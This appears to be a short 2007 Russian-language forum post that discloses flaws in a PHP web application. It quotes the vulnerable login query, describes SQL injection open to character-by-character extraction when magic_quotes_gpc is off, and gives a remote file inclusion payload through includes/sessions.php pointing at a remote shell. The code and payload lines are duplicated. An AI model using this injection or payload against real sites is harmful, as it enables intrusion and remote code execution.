gemaglabin
30.06.2007, 16:01
SQL иньекция в функции логина , но под чужим аккаунтом не залезть.Возможен посимвольный перебор при условии что magic_quotes_gpc = off
$sql = "select * from $tblUsers where login = '$login'";
if ( $login != $row['login'] ) $valid_user = 0;
if ( $password != $row['password'] ) $valid_user = 0;
RFI includes/sessions.php?wb_class_dir=shell?
$sql = "select * from $tblUsers where login = '$login'";
if ( $login != $row['login'] ) $valid_user = 0;
if ( $password != $row['password'] ) $valid_user = 0;
RFI includes/sessions.php?wb_class_dir=shell?